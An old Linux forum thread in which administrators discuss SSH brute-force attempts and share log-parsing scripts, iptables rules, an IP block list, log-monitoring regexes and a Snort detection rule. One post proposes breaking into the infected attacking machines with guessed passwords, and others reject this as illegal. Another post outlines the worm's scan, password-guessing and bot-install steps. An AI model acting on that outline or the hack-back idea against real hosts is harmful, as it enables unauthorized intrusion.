Logwatch is a tool that will allow you to monitor your log files and deliver daily/hourly/5mins reports into your mail. Once upon a time there was the great logcheck. If you find a copy of that use logcheck, it is MUCH better event tough it can be quite verbose.

run

```

netstat -lnp

```

as root and disable all unnecessary services (usually all those you don't what they are for)

And yes, install a firewall (even MS got this by now...   :Wink:  )

----------

## vdboor

 *dsegel wrote:*   

>  *braverock wrote:*   
> 
> I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command. 
> 
>   - Brian 
> ...

 

Perhaps this is a start:

```
#!/bin/sh

grep "Failed password for illegal user" /var/log/current/info.auth \

 | sed -e 's/.*user [^\ ]\+ from //'  -e 's/ port.*//'             \

 | sort \

 | uniq \

 | grep -v '^127\.0\.0'
```

I visited a Linux security workshop once, and I've been told there are standard (spam) blacklists available at the Internet somewhere. That sysadmin blocked new IP addresses for 3 days, and if they appeared more often on these spammer-lists, he eventually blocked them forever.

The reason for the 3 day block: e-mail servers try to deliver e-mail for 5 days, blocking an IP 3 days make sure the e-mail server would eventually deliver the message if the IP got on the list by accident.

 *DaveHope wrote:*   

> Been looking into this, and it appears that there's an IRC channel full of these drones. (Machines which have been hacked, and are running a client which leaves them in an IRC channel). Not 100% yet, but am looking into it. I'm also tempted to setup a small honeypot and let them play for as long as need be.

 

Hmz.. reminds me of this: http://www.grc.com/dos/grcdos.htm

----------

## oog

I read through this whole thread and while I think I'm doing the right things to secure my ssh connections (I use a key, disabled root logins, enabled only my own account, turned off all other forms of authentication), I still haven't found a way to force a person to wait for a period of time before they can try another ssh connection. I saw a number of people suggest that in this thread. Does someone know how to do this?

----------

## GenKreton

 *oog wrote:*   

> I read through this whole thread and while I think I'm doing the right things to secure my ssh connections (I use a key, disabled root logins, enabled only my own account, turned off all other forms of authentication), I still haven't found a way to force a person to wait for a period of time before they can try another ssh connection. I saw a number of people suggest that in this thread. Does someone know how to do this?

 

I have searched very briefly for an acceptable way of doing this, it would be very useful to have it as an option in sshd itself.

----------

## revertex

i changed the default ssh port (22) to a higher port (2222).

now the only connections attempt that i see in my logs are mine.

all these attempts seems be produced by linux boxes compromissed by a fool script that only looks for servers with port 22 open.

some dumbass sysadmins must be empaled, how someone with a linux knowledge let your boxes be infected by that stupid worm/script?

i guess they are MSCE forced to deploying linux, then they make it most insecure as possible to blame linux as a unsafe system.

----------

## ARC2300

Don't know about anyone else, but I do think that if you get hammered enough on these tries, it can crash your box, or at least drop it offline.  I've had my server up for 120 days, no problem.  This started, and my box crashes almost every 5 days until I changed ports.  And no, there aren't any strange directories or users, and netstat shows only my local IPs causing traffic.

http://home.insightbb.com/~arcruea/attempts.log << Lots of attempts on my IP from 5 log files.

I must say, though, that this is REALLY pissing me off.  I've emailed countless abuse@ISP addresses now, and finally gave up.  I should write a script, though, that does it for me.

And I looked at one of the address in that attempt log in a web browser. . .it's an HTTP debian server with default install.    :Confused: 

----------

## jkroon

Aha, weird thread.

Anyway, when these were at their peaks I picked up to 7 or 8 attempts up per day over a period of about 3 months, still getting a few every now and again.  Mostly from taiwan and surrounding area...

port knocking was mentioned a few times, so http://www.kroon.co.za/portknock.php - let me know what you think.  I've put this together a while back on request from a system administrator.  Afaik there is no problems with it and I've used it for a while until I decided that ssh really is secure enough.

And about the iptables firewall, the following small set of rules should do:

```
#! /bin/bash

EXT=eth0

INT=eth1

iptables -F

iptables -P INPUT DROP

iptables -P OUTPUT ACCEPT

iptables -P FORWARD DROP

iptables -A INPUT -m state --state related,established -j ACCEPT

iptables -A INPUT -i lo -j ACCEPT

iptables -A INPUT -i $INT -p tcp -m multiport -dports 22,25,80,139,445 --syn -j ACCEPT

iptables -A INPUT -i $EXT -p tcp --destination-port 22 --syn -j ACCEPT

iptables -A INPUT -i $INT -p udp -m multiport 53,137,138 -j ACCEPT

iptables -A FORWARD -m state --state related,established -j ACCEPT

iptables -A FORWARD -i $INT -o $EXT -p tcp -m multiport -dports 22:80:110:143:443:6667 --syn -j ACCEPT

iptables -t nat -A POSTROUTING -o $EXT -j MASQUERADE
```

You can of course restrict OUTPUT too  :Smile: .  Also, remember to adjust those port numbers to your needs.  Be warned, nmblookup '*' breaks with this ruleset.

----------

## rex123

 *revertex wrote:*   

> some dumbass sysadmins must be empaled, how someone with a linux knowledge let your boxes be infected by that stupid worm/script?
> 
> i guess they are MSCE forced to deploying linux, then they make it most insecure as possible to blame linux as a unsafe system.

 

It's obviously a fallacy to assume any of these:

- Linux users are excellent sysadmins (just look at these forums :) )

- Windows users hate Linux (again, see how many people here use both)

- The fact that a Linux vulnerability can be exploited is somehow down to Microsoft-lovers with a grudge (this is amazingly irrational)

----------

## jkroon

Well put.

No, I'm afraid as the masses convert (if they ever do) we will see many, many, many more of these types of problems.

I've also had a few "Administrator" attempts, probably aimed at OpenSSH running on Windows ...

Also, I've actually heard of quite a number of successful breakins based on these test type users...

----------

## vdboor

 *rex123 wrote:*   

> It's obviously a fallacy to assume any of these:
> 
> - Linux users are excellent sysadmins (just look at these forums  )
> 
> - Windows users hate Linux (again, see how many people here use both)
> ...

 

No, I believe there are a lot of dumb linux users out there.. perhaps not at these forums, but I wouldn't be surprised to notice how many kids/students playing with Linux, run a nice desktop without knowing what ssh exactly is. ...or run ssh without changing the sshd_config file.

I think the following comment proves this theory:

 *jkroon wrote:*   

> Also, I've actually heard of quite a number of successful breakins based on these test type users...

 

----------

## ai

 *ARC2300 wrote:*   

> Don't know about anyone else, but I do think that if you get hammered enough on these tries, it can crash your box, or at least drop it offline.  I've had my server up for 120 days, no problem.  This started, and my box crashes almost every 5 days until I changed ports.  And no, there aren't any strange directories or users, and netstat shows only my local IPs causing traffic.
> 
> http://home.insightbb.com/~arcruea/attempts.log << Lots of attempts on my IP from 5 log files.
> 
> I must say, though, that this is REALLY pissing me off.  I've emailed countless abuse@ISP addresses now, and finally gave up.  I should write a script, though, that does it for me.
> ...

 

A script, that adds the ip of an supposed abuser (lets say 3 failed attempts) to host.deny would be great ;] something like portsentry which additionally monitors sshd logs.

----------

## flickerfly

Is anyone using tenshi to do reports on the logs for you? I'm curios what your config would look like. I've been meaning to get into that prog and this seems like a good test subject.

I don't care that they fail to log in on I shant try to block them, but I can learn from their efforts.   :Very Happy: 

----------

## ARC2300

 *ai wrote:*   

>  *ARC2300 wrote:*   Don't know about anyone else, but I do think that if you get hammered enough on these tries, it can crash your box, or at least drop it offline.  I've had my server up for 120 days, no problem.  This started, and my box crashes almost every 5 days until I changed ports.  And no, there aren't any strange directories or users, and netstat shows only my local IPs causing traffic.
> 
> http://home.insightbb.com/~arcruea/attempts.log << Lots of attempts on my IP from 5 log files.
> 
> I must say, though, that this is REALLY pissing me off.  I've emailed countless abuse@ISP addresses now, and finally gave up.  I should write a script, though, that does it for me.
> ...

 

Yes, that would be great, but I have a few legit users that have failed to log in within 3 tries either due to forgetting their password or because they don't know about the 10 second limit I've imposed for logging into the machine.

I just decided to bump the port way, way up.  Hopefully that'll fix problems.

----------

## jkroon

You really do not a lot of these attempts per second before it should start becoming a serious issue, as in to the degree of slowing down your host.  There should be no way for it to crash your machine.  It might take it "offline" due to all your bandwidth being absorbed, but there are more effective, stealthier ways to achieve that, such as smurf attacks, or even simple SYN flooding from a spoofed address.

A quick question to ARC2300, you say your box crashed when this started?  What exactly crashes, OpenSSH, the kernel, or some other subsystem?

----------

## gigel

after seeing the texts and where they hosted the files i suspect(i mean,i'm sure) there are just another bunch of romanian lamers...

 *bcore wrote:*   

> but I'm thinking I'm gonna set sshd up to only allow key logins, since I use keychain from work. I've already also got it set up do disallow root logins, so I figure I should be reasonably safe...

 

this is a good thing to do in these case of attacks,but if one is trying to exploit a pre authentification bug than you're compromised...

i suggest you filter from iptables(or any other method) to allow only ssh logins only from trusted IP's

----------

## vdboor

 *ARC2300 wrote:*   

> Don't know about anyone else, but I do think that if you get hammered enough on these tries, it can crash your box, or at least drop it offline.  I've had my server up for 120 days, no problem.  This started, and my box crashes almost every 5 days until I changed ports.

 

This gives me the impression one of your services or kernel already crashed on an exploit attempt. I can hardly believe sshd would crash your machine because it rejects normal login attempts, something else is happening here.

Note that the difference between a application crash and successful exploit are very subtile. If an application crashes on incorrect input, it is likely there is also a way to send data that doesn't crash the app, nevertheless corrupts memory (and exploits your app in the process).

----------

## bware

In general simply run some rootkit checkers to detirmine wether you've been rooted  :Smile: 

On a side note... most virus scanners (including the windows variants) are able to detect most rootkits/exploited files.

If you suspect your machine, disconnect it from the net - to keep others from being abused - and check to see if it is so running rootkit checkers, virus scanners, etc. by booting from unwritable media (livecd).

Programs to check are useradd, ps, ls, grep - most rootkitcheckers will do this for you - examine timestamps (simple ls -la will suffice).  If you're victim, I'd suggest a clean install, but then again it's up to you

----------

## ARC2300

Actually, I know it hasn't been rooted, as not strange directories have shown up, as well as nothing strange in the logs, and netstat -a shows up nothing out of the ordinary.

And it just crashed after I've switched the port to one much higher, so I'm thinking it's something else.  That motherboard has been giving me issues for some time, such as not wanting to take on the other 80GB HDD I just put in (that works fine everywhere else), and losing BIOS information occasionally.

----------

## vdboor

 *ARC2300 wrote:*   

> Actually, I know it hasn't been rooted, as not strange directories have shown up, as well as nothing strange in the logs, and netstat -a shows up nothing out of the ordinary.

 

Note that your kernel could be trojaned (with a new module loaded) that hides these files from "ls", and "netstat". These binaries can be trojaned too off course to hide the rootkit..

 *Quote:*   

> And it just crashed after I've switched the port to one much higher, so I'm thinking it's something else.  That motherboard has been giving me issues for some time

 

Sounds more logical in this case indeed...

mod edit: removed doublepost.

amne

----------

## hanj

 *Quote:*   

> braverock wrote:
> 
> I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command.
> 
> - Brian

 

You may want to look into snortsam plugin for snort. You can append snortsam plugin to specific rule which will add a chain to iptables. You can have it block for x number of minutes, etc. You can also protect yourself from self DoS, by adding your networks and/or DNS servers, etc from the 'exclude' list.

Snortsam is in portage:

net-analyzer/snortsam-2.24

If you use the bleeding -rules and add SSH Scan rule to your existing snort rule, you can spot these SSH attempts

http://www.bleedingsnort.com/

Here is the SSH Scan signature/rule:

alert tcp any any -> $HOME_NET 22 (msg:"BLEEDING-EDGE Potential SSH Scan"; flags:S; threshold:type threshold, track by_src, count 5, seconds 120; classtype:attempted-dos; sid:2001219; rev:6; ) 

HTH

hanji

----------

## hanj

 *Quote:*   

> flickerfly wrote:
> 
> Is anyone using tenshi to do reports on the logs for you? I'm curios what your config would look like. I've been meaning to get into that prog and this seems like a good test subject. 

 

You could set up tenshi or swatch to monitor your logs and report on failed connections or successful connections to ssh..here is my tenshi config piece dealing with sshd

```

group ^sshd(?:\(pam_unix\))?:

critical ^sshd: fatal: Timeout before authentication for (.+)

critical ^sshd: Illegal user

report   ^sshd: Connection from (.+)

report   ^sshd: Connection closed (.+)

report   ^sshd: Closing connection (.+)

report   ^sshd: Found matching (.+) key: (.+)

report   ^sshd: Accepted publickey (.+)

report   ^sshd: Accepted rsa for (.+) from (.+) port (.+)

report   ^sshd: Accepted keyboard-interactive/pam for (.+) from (.+) port (.+)

root     ^sshd\(pam_unix\): session opened for user root by root\(uid=0\)

root     ^sshd\(pam_unix\): session opened for user root by \(uid=0\)

report   ^sshd\(pam_unix\): session closed for user (.*)

root     ^sshd\(pam_unix\): session opened for user (.*)

critical ^sshd\(pam_unix\): authentication failure; logname=

critical ^sshd: Failed password for

report   ^passwd\(pam_unix\)\[(.*)\]:

root   ^sshd: Accepted password for

group_end
```

You can do something very similar with swatch, but tenshi is much more robust. All critical and root items are emailed to me immediately, reports are sent in every 8 hours.

HTH 

hanji

----------

## ARC2300

 *vdboor wrote:*   

>  *ARC2300 wrote:*   Actually, I know it hasn't been rooted, as not strange directories have shown up, as well as nothing strange in the logs, and netstat -a shows up nothing out of the ordinary. 
> 
> Note that your kernel could be trojaned (with a new module loaded) that hides these files from "ls", and "netstat". These binaries can be trojaned too off course to hide the rootkit..
> 
>  *Quote:*   And it just crashed after I've switched the port to one much higher, so I'm thinking it's something else.  That motherboard has been giving me issues for some time 
> ...

 

AFAIK, you can't change the date/time a file was written, though.  I don't use modules whatsoever for this reason, and my bzImage has the same date and time since last compile.

----------

## Chris W

Thou shalt not allow tunnelled, clear-text password authentication over SSH  :Wink:    Public key authentication or no access. 

```
# To disable tunneled clear text passwords, change to no here!

#PasswordAuthentication yes

PasswordAuthentication no

```

For you: carrying around a private key with a good passphrase is a small price to pay.

For the cracker: no amount of guessing is going to yield a useful key in a reasonable amount of time.

----------

## hanj

 *Quote:*   

> 
> 
> ARC2300 said:
> 
> I must say, though, that this is REALLY pissing me off. I've emailed countless abuse@ISP addresses now, and finally gave up. I should write a script, though, that does it for me. 

 

You should try incident.pl. It uses output from ACID and does a whois to retrive abuse contacts of the offending IP. The format it needs is mbox file, so if you're running with .maildir like me, you'll need another script that cats all the mails together prior incident.pl

http://freshmeat.net/projects/incident.pl/

HTH 

hanji

----------

## ttuttle

I got an idea.

Since you know the breakins come from another computer with this worm, how about you create an account with a shell that tries to log in to the other computer with those username/password pairs, and when it finds one working, delete the worm, leave a README.TXT in the home directory (in case someone uses that account) and change the password to a random string.

----------

## Aaton

Well I have been blocking thoses system from my system by running a simple script over my logs.

```
#!/bin/bash

cd /var/logs

cat /etc/bad-ips > bad-ssh

cat auth.log |grep Illegal | sed -e 's/^.*from //g' |sort -u >> bad-ssh

cat auth.log.0 |grep Illegal | sed -e 's/^.*from //g' |sort -u >> bad-ssh

zcat auth.log.[1-6].gz |grep Illegal | sed -e 's/^.*from //g' |sort -u >> bad-ssh

# 2.6.x kernel have ::ffff: on my system atleast...

cat bad-ssh | sed -e 's/::ffff://g'| sort -u |sort -n > /etc/bad-ips 
```

Then in my firewall script just loop through the list and say good by to them.  I run both by hand instead of from cron currently. 

```
# create NOLOGDUMP table since I don't care to see things

# junking up my logs that I know I'm blocking

/sbin/iptables -N NOLOGDUMP > /dev/null

/sbin/iptables -F NOLOGDUMP

/sbin/iptables -A NOLOGDUMP -p tcp -j REJECT --reject-with tcp-reset

/sbin/iptables -A NOLOGDUMP -p udp -j REJECT --reject-with icmp-port-unreachable

/sbin/iptables -A NOLOGDUMP -j DROP

#----------------------------------------------

# The IP's that I don't want people connecting

# from for one reason or another. Bad mojo...

#----------------------------------------------

for i in `cat /etc/bad-ips`

do

        /sbin/iptables -A INPUT -i eth0 -s $i/32 -j NOLOGDUMP

        echo -n "."

done
```

Also if your able to do it you should make some changes to your sshd_config to not allow root logins and only allow yourself. Plus I only allow access via SSHv2 keys which are passphrase protected.

```
AllowUsers your-username@*

PermitRootLogin no

PermitEmptyPasswords no

PasswordAuthentication no
```

The current list of IP's that my boxes won't be talking to for a while  :Smile: 

```
4.20.167.136

32.97.118.83

61.135.145.249

61.138.232.60

61.143.64.20

61.150.43.123

61.211.239.236

61.237.240.19

62.193.142.1

62.193.232.184

62.44.16.251

64.251.27.26

64.9.94.130

65.120.161.253

65.217.45.164

65.35.250.245

65.75.181.100

66.15.145.131

66.236.24.228

66.237.31.114

66.35.98.27

66.79.160.187

66.88.132.38

66.98.180.23

69.59.172.140

80.252.99.102

80.53.151.83

80.53.18.106

140.112.65.123

140.113.156.127

140.123.111.43

140.130.114.134

148.231.21.31

152.1.100.215

163.19.1.111

163.27.99.67

195.22.30.170

195.235.100.122

200.204.145.218

200.223.130.179

200.68.1.187

202.123.169.217

202.39.224.36

202.39.71.115

203.131.125.155

203.192.141.113

203.197.22.83

203.203.212.175

203.251.225.23

203.69.243.102

203.72.63.101

203.75.73.211

205.206.125.61

205.252.89.78

206.225.84.3

208.37.31.20

210.0.186.83

210.127.244.75

210.172.161.55

210.212.85.11

210.250.51.252

210.95.186.129

211.138.113.23

211.157.101.13

211.169.202.20

211.169.202.21

211.199.181.85

211.206.121.204

211.219.30.145

211.234.100.105

211.234.52.115

211.241.101.137

211.248.38.252

212.100.197.34

212.160.103.92

213.155.196.143

213.22.143.6

213.25.118.70

213.8.141.243

217.58.140.2

218.153.215.158

218.157.239.68

218.232.19.190

218.24.205.20

218.28.44.152

218.30.21.236

218.54.200.87

220.65.128.4

220.67.180.33

220.70.167.67

220.80.108.78

220.94.138.85

221.11.1.72

221.224.15.42

222.47.83.41

```

----------

## hanj

In case anyone hasn't heard... since ACID has been 'dead' for awhile, there is BASE, which is in active development! 

http://base.secureideas.net/

 *Quote:*   

> BASE is the Basic Analysis and Security Engine. It is based on the code from the Analysis Console for Intrusion Databases (ACID) project. This application provides a web front-end to query and analyze the alerts coming from a SNORT IDS system.

 

hanji

----------

## dat

I just checked my logs today, and I noticed this in there:

```

datbox:~# grep -i sshd /var/log/auth.log | tail -n 50

Dec 12 13:46:46 datbox sshd[23638]: Bad protocol version identification 'cisco' from 82.96.96.3

Dec 12 13:46:46 datbox sshd[23639]: Bad protocol version identification '82.96.96.3:802' from 82.96.96.3

Dec 12 14:19:10 datbox sshd[23699]: Bad protocol version identification 'cisco' from 82.96.96.3

Dec 12 15:47:06 datbox sshd[23851]: Bad protocol version identification 'cisco' from 82.96.96.3

Dec 12 15:47:06 datbox sshd[23852]: Bad protocol version identification '82.96.96.3:802' from 82.96.96.3

Dec 12 17:09:24 datbox sshd[23999]: Bad protocol version identification 'cisco' from 82.96.96.3

```

Now, as a little background info, I run my sshd on 23 instead of port 22.  I'm assuming that someone is trying to hack into my box thinking that it's telnet and not sshd (hence the bad protocol version).  What throws me off is the 'cisco'.   Do they think it's actually a cisco box or something?

----------

## jkt

 *ReneeTeunissen wrote:*   

> Well, first thing I do is to ADD a second account "root" (eg toor or something like that and remove the shell from th real root. eg a small script as login shell which will email you or /bin/false.

 

...and when some of your init script wants root password (for example when your root fs gets broken), you have troubles...

----------

## jkt

 *ThinkingInBinary wrote:*   

> I got an idea.
> 
> Since you know the breakins come from another computer with this worm, how about you create an account with a shell that tries to log in to the other computer with those username/password pairs, and when it finds one working, delete the worm, leave a README.TXT in the home directory (in case someone uses that account) and change the password to a random string.

 

very bad idea, this will be considered illegal. it's the same as breaking into someone else's house, changing his front door lock and leaving a message "your doors were insecure. I've replaced your lock, keys are not available (I've destroyed them)."

You'll run into trouble if you do something like that.

----------

## jkt

 *ARC2300 wrote:*   

> AFAIK, you can't change the date/time a file was written, though.  I don't use modules whatsoever for this reason, and my bzImage has the same date and time since last compile.

 

Of course you can. `man touch` for details.

----------

## setagllib

I don't know if it's been mentioned herein (too many pages and not enough time to check them all  :Smile: ), but you *really* should use pubkey-only authentication on your sshd. This is infinitely harder to crack than plain passwords, and makes this kind of dictionary attack virutally impossible, at least impractical.

There's a sufficiently useful guide to this here: http://open.bsdcow.net/tutorials/ssh_pubkey_auth (for OpenBSD, but the procedure is the same for any OpenSSH).

I very strongly recommend disabling every other kind of authentication. When you get an error authenitcating, the auth methods in parentheses should only be 'publickey'.

In fact, avoid password and PAM authentication everywhere you have a choice. Passwords are just silly and PAM has a lot of design inconsistencies that allow exploits. For reasons to hate PAM, see here: http://bsd.slashdot.org/comments.pl?sid=131835&threshold=-1&commentsort=0&tid=8&tid=7&mode=thread&pid=11028401#11029113

I would also advise running your sshd on a different port (I do 4222, that's already beyond scanners expecting 22) and restricting your iptables firewall to only allow very trusted networks or specific IPs. It's worth it, trust me.

And of course frequently doing an audit of accounts is helpful if you still insist on using password auth. For pubkey, just cat your .ssh/authorized_keys and see if there are any keys there you don't remember putting in (chances are someone slipped one in after compromising your system to make it easier next time).

----------

## dat

 *dat wrote:*   

> I just checked my logs today, and I noticed this in there:
> 
> ```
> 
> datbox:~# grep -i sshd /var/log/auth.log | tail -n 50
> ...

 

I just noticed more of these messages coming from the same ip address.  They appear every couple days or so.  And just a few of them.  Any ideas?

EDIT: Nevermind.  It appears that I'm just getting scanned by freenode's servers looking for an open proxy running on system.  Guess I should've done a reverse dns lookup first!    :Wink: 

----------

## Randy R

I too found that someone had been in the test account on my machine. I changed the password and logged in and tried to execute "ls" and i recieved an error. The .bash_history file showed that who ever had access had been able to execute commands including "ls" The only group that test belongs to is test.

One of the packages that was downloaded is: mihai at ftp://elephant.homeunix.com/pub

Does any one know what that is?

EDIT: This file is on my server. I did not show the url that the hacker used.

----------

## ixion

Randy R, you've been compromised. I'd recommend a format and never using an account named test. If you have to play with something, use some obscure account name..  :Wink: 

edit: removed compromise story.. I actually wasn't compromised, logwatch was just picking up entries from a year ago this time, haha!  :Wink: 

----------

## rex123

I don't want to seem soft on crackers or anything, but I'm not sure we should all be formatting disks just because someone has logged on via ssh.

The only bad thing to have happened is that someone has logged on who you don't know, and maybe their intentions are less than honourable.

There seems to be a global effort to put IRC bots onto as many machines as possible, and ssh with bad passwords is the point of attack. But by default nobody will get root access, and there's no reason to assume that just because someone logs on they have got root. Actually, there should be good reason to assume the opposite, or there's no point having non-privileged accounts.

If someone logged on to your windows box and did "format c:", we would say "Windows security is rubbish". If you format your drive just because someone you don't know logs on, what's the difference?

----------

## jkt

If someone logged in to your box as non-privileged user and you have fairly recent system (so there are no known security bugs) and nothing says (s)he has got root access, there is no need to reinstall. However, if your box software is older and wasn't upgraded for some time and contains known security bugs leading to local privilege escalation, you do have a trouble and the only wise solution is to either restore from safe backup or reinstall.

You can't trust your machine if someone else got root access.

----------

## dat

If someone was able to crack into your system, I think the best thing to do is assume the worst.  Surely it's not that difficult to back up your data and reinstall - albeit somewhat time consuming.

Anyway, that's my security policy.

----------

## hw-tph

Fun with stats! These are all from my laptop, which is not online 24/7, probably just about 6-10 hours a day.

Failed attempts during the last week:

```
hw@royne:~$ grep "Illegal user" /var/log/messages | wc -l

304
```

Unique number of hosts these attempts are coming from:

```
hw@royne:~$ grep "Illegal user" /var/log/messages | gawk '{ print $10 }' | sort -u | wc -l

18
```

Unique IP addresses:

```
hw@royne:~$ grep "Illegal user" /var/log/messages | gawk '{ print $10 }' | sort -u

192.192.73.119

202.93.171.2

211.218.149.213

211.250.15.2

212.72.201.193

213.171.37.3

216.118.117.117

217.222.89.228

220.130.245.9

24.107.37.231

61.220.130.92

62.44.16.251

63.241.142.67

64.246.40.136

66.15.145.131

67.110.180.136

81.30.206.242

84.118.242.4
```

I don't have the stats from my wannabe-server box (my desktop, which is online 24/7 with a public IP address), but I did notice that the desktop had way more attempts per online hour than my laptop. This I assume has something to do with my desktop being on a network where everyone has 10/10mbit connections or better and my laptop mostly being online on a network where 512/256kbit is the standard. This could suggest that the script kiddies are targeting networks where you are more likely to have a high performance network connection. 

Håkan

----------

## DeathAndTaxes

Uh, yeah.  Golly, good idea about the port-knocking, except the last I heard about the port-knocking was that a guy released the binaries with hard-coded knock sequences.  If there's been another development since then, I've not heard about it.

I've seen these attempts on many different boxes...Not surprisingly, many of the connections come from the 210. and 211. (AKA, a good chunk of China) class A blocks.  Those entire class A's get dropped on every box I admin because they're such a good source of spam already...Not surprised even more nefarious activities are coming from over there.

----------

## setagllib

I'm on Optus in Australia and I have a 211., and some friends on another node have 210. Not sure about China's range but we're here too.

Port knocking is a great idea if done right, but I'm happy just having a selective packet filter, a mysterious port, and public key logins. I've never once been compromised (even back in my Windows days) so I always have luck on my side.

Linux is shamefully the second-most compromised system, second only to Windows (this is a statistic I heard a while ago, maybe it's changing). This is more because of silly admins than software quality, but it's not untrue to say there have been a lot of careless security issues even in the kernel. With all the funding and separate projects to secure Linux, don't you think it'd be the most secure system out there? Not really. All of the BSDs do it as a base ideal, not something to be left for external investigation.

I repeat: if you *really* value security, run a BSD. Linux is still a convenience (and scalability) system. I'm not trying to spread FUD, I really like Linux, but this is one area that still troubles me to date.

----------

## ixion

I have to say the default install of BSD is pretty darn solid.. but the features are not nearly as easy to implement as Gentoo.. so it all weighs between convenience, features, and security.. you can't have it all..  :Wink: 

----------

## jkt

 *setagllib wrote:*   

> Linux is shamefully the second-most compromised system, second only to Windows (this is a statistic I heard a while ago, maybe it's changing). This is more because of silly admins than software quality, but it's not untrue to say there have been a lot of careless security issues even in the kernel.

 

IMHO the second place is because of its market share - compare total amount of systems connected to internet running linux and some bsd... (not commenting security aspects of kernel etc, I haven't knowledge to do it). And of course sillness (is it correct expression in english?) of admins is quite a important reason, too  :Wink: .

----------

## overcast

 *bcore wrote:*   

> I'm certainly willing to tar up the directory for anyone who is curious. I have no way of hosting it though...

 

don't worry, we'll just download it off your box   :Laughing: 

----------

## chovy

I too had a ton of ssh attempts in my log file. Real names, like susie, robert, etc. all were failed attempts.

i keep my box open to ssh so i can login from anywhere

----------

## Phonics3k

I have had loads on my server to coming from korea, the box is running fedora at the moment, but when I have 5 mins (Boxing day) then i will put gentoo on it and really put the walls up.

I was putting the IP's that were connecting to me in hosts.deny, is that a good thing to do? I also blocked root from logging in on ssh and only leave protocol 2 ssh logins.

----------

## rbr28

Wow, I didn't bother reading this whole thread, so I apologize in advance if this was already mentioned.  If you are using Gentoo, why not take advantage of the easy to use security features.  Tcp-wrappers is a good example.  tcpd is a default use flag and that enables tcp wrappers support in network services that support it (most of them).  All you need to do is create an /etc/hosts.allow and /etc/hosts.deny file.  Put ALL:ALL in /etc/hosts.deny.  Put ALL:127.0.0.1 in /etc/hosts.allow.  You've now increased security on your system dramatically.  If you need to open up services to other machines on your network, or outside your network, read up on tcp-wrappers, it's soooo easy to configure.  

The other obvious option is a firewall.  Gentoo makes it so easy to install a firewall, with many very easy to configure iptable front-ends.  I prefer Shorwall, but it's not as easy to configure as some of the others.  Some of the gui front-ends like Firehol are really easy to configure.

I mention these two options, despite the fact that they are obvious, because users still neglect to use them.  They are both so easy to use, and unlike some other security options, these two will help secure your machine, even if you make a lot of other mistakes.  For example, if your machine is firewalled, with no ports open, having an account you forgot about wouldn't be remotely exploitable (at least not easily).   Sysadmins know that firewalls are not the solution to all security problems, but for most users they plug a lot of holes.

If you get one or both of those configured, then you can go about looking at all the other options.  Check out the security guide in the Gentoo docs.  Take a look at the hardened-dev-sources and Grsecurity, which is a very easy way to add security.

Configure your logs properly.  Most users unfortunately don't do this, but just stick with whatever the default config is.  One thing I always do is extract all login information to it's own log.  Make sure you rotate your logs so they are easier to scan.  Automated monitoring is also very useful.  Again, these are just some obvious tips.  There's really no excuse for a Linux box being hacked.

----------

## gentoo_lan

They didn't hack into my smtp but they certainly tried to:

```
Dec 31 03:34:02 [postfix/smtpd] connect from unknown[221.140.55.113]

Dec 31 03:34:03 [postfix/smtpd] NOQUEUE: reject: RCPT from unknown[221.140.55.113]: 554 <smtphunter77@daum.net>: Relay access denied; from=<a0mnxyk9eakgbxq@yahoo.com.au> to=<smtphunter77@daum.net> proto=SMTP helo=<67.168.249.139>

Dec 31 03:34:03 [postfix/smtpd] lost connection after RCPT from unknown[221.140.55.113]

Dec 31 03:34:03 [postfix/smtpd] disconnect from unknown[221.140.55.113]
```

----------

## rinnan

 *Valhlalla wrote:*   

> My system is set up to email me any failed logins, but since I'm parranoid I'm going to check anyway 

 

Good thing I don't do that -- I would have gotten 107 e-mails for the last 3 days.  Better than spam!

----------

## appleboy

One thing that I would like to see created  is a program that monitors logs and whenever failed attempts are made on programs like ssh, telnet, etc. it automatically finds the ISP and sends them an email with the log and some information. I think if the ISPs started getting tons of email from automated programs telling them their client's are hacked they would start doing some massive overhaul and go after their clients to clean up their computers. heck, if they're systems crashed from getting so much email, I think it would make them open an eye or two   :Twisted Evil: 

----------

## kill

 *appleboy wrote:*   

> One thing that I would like to see created is a program that monitors logs and whenever failed attempts are made on programs like ssh, telnet, etc. it automatically finds the ISP and sends them an email with the log and some information.

 

You should have read the entire thread.

 *hanj wrote:*   

> You should try incident.pl. It uses output from ACID and does a whois to retrive abuse contacts of the offending IP. The format it needs is mbox file, so if you're running with .maildir like me, you'll need another script that cats all the mails together prior incident.pl 
> 
> http://freshmeat.net/projects/incident.pl/

 

----------

## massheep

i got zero failed logins since i changed my sshd port from 22 to 59999  :Smile: 

to do so you need to edit  /etc/ssh/sshd_config and change the line

```
Port 22
```

 to 

```
Port 59999
```

(or to which port you like).

don't forget to adjust firewall if you got one.

----------

## jkt

 *appleboy wrote:*   

> One thing that I would like to see created  is a program that monitors logs

 

give "tenshi" a try. it's a project being developed by gentoo team, originally used on getnoo core servers.

----------

## zephirus

Wow... I checked my messages file because of this thread, and now I am glad that I only allow ssh access with strict publickey auth. After all those failed attempts I ran a chrootkit anyway, and it seems I am fine.  :Smile: 

Of course, as I am ever curious about Info Security, does anyone have any resources that explain both how to accomplish, and how to protect from, SSH hacks? I would like to better understand both sides of the coin...

----------

## rex123

 *zephirus wrote:*   

> Of course, as I am ever curious about Info Security, does anyone have any resources that explain both how to accomplish, and how to protect from, SSH hacks? I would like to better understand both sides of the coin...

 

I can tell you how to accomplish this particular (most prevalent) 'hack':

1) search for machines listening on port 22

2) try to log on as test/test, root/root, john/john, etc (you can make up your own)

3) when you find a machine that allows you in, use it to find more similar machines until you get kicked off

4) install an irc bot on each machine that allows you to control the machine remotely via an undernet irc channel

5) also try to get root access via a few known local exploits, hoping that the administrator hasn't patched something or other. This isn't actually necessary, but it's kind of fun.

6) Once you've got your army of bots up to more than 1000 machines, you are the most 7337 h4X0r ever, and can retire.

To protect yourself from it, don't use your login name, or "password", or "test" etc as your password.

To protect yourself better, move your ssh port, don't run ssh, only allow certificate-based logins, use port knocking, restrict access by IP, or just turn your computer off :)

----------

## zephirus

 *rex123 wrote:*   

> use port knocking

 

Now that I want to learn... That looks very valuable... Any suggestions on reading material, tutorials, and/or how-tos on this??

----------

## mtamizi

 *Quote:*   

> Now that I want to learn... That looks very valuable... Any suggestions on reading material, tutorials, and/or how-tos on this??

 

Here's some fairly general tips on security.

Run Nessus on your computer for network security auditing to protect your computer.  Also try out `nmap` the port scanner.  Note: Nessus can be pointed at other peoples computers to find vulnerbilities on remote hosts.

For reading material:

* Anything by the Honeynet project. http://project.honeynet.org/papers/index.html

* http://www.phrack.org/

